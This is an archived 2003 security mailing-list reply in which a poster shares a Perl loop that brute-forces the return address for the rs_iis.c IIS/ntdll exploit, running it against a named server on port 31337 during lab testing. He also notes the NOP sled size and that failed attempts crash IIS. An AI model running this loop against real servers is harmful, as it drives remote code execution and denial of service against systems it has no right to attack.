RE: Generating Hex Numbers to brute force rs_iis.c

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I'm no perl expert, but this is what I whipped up for a similar test:

$myserver = "pvdnet05";
for ($i = 0; $i < 256; $i++) {
 $retcode = sprintf("%x", $i);
 $exec = "./rs_iis $myserver 80 31337 " . $retcode . "04";  system($exec);
 sleep(1);
}

Note that the last byte of the RET address is not terribly significant, since the NOP sled is ~65K in size and this value is only max 256 bytes significant.

This didn't work well for me, since IIS will sometimes crash without a valid RET address, requiring a server restart. I had meant to look for a way to restart Windows 2000 services from a Linux box with Samba or similar tool, but got bored with it and started trying to exploit something else. :)

• -Joshua Wright Senior Network and Security Architect Johnson & Wales University Joshua.Wright@jwu.edu http://home.jwu.edu/jwright/

pgpkey: http://home.jwu.edu/jwright/pgpkey.htm fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73

> In playing with rs_iis.c (ntdll exploit) in our lab, I've been

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

iQA/AwUBPor/AY/i/ArUS0pzEQJ75wCeNFPqMa0+AwwuCcYgb7YwRdt98KsAn2HZ Il0dIPyWAX6swPIQfg/LvvQk
=hz0W
-----END PGP SIGNATURE----- Received on Thu Apr 3 13:07:09 2003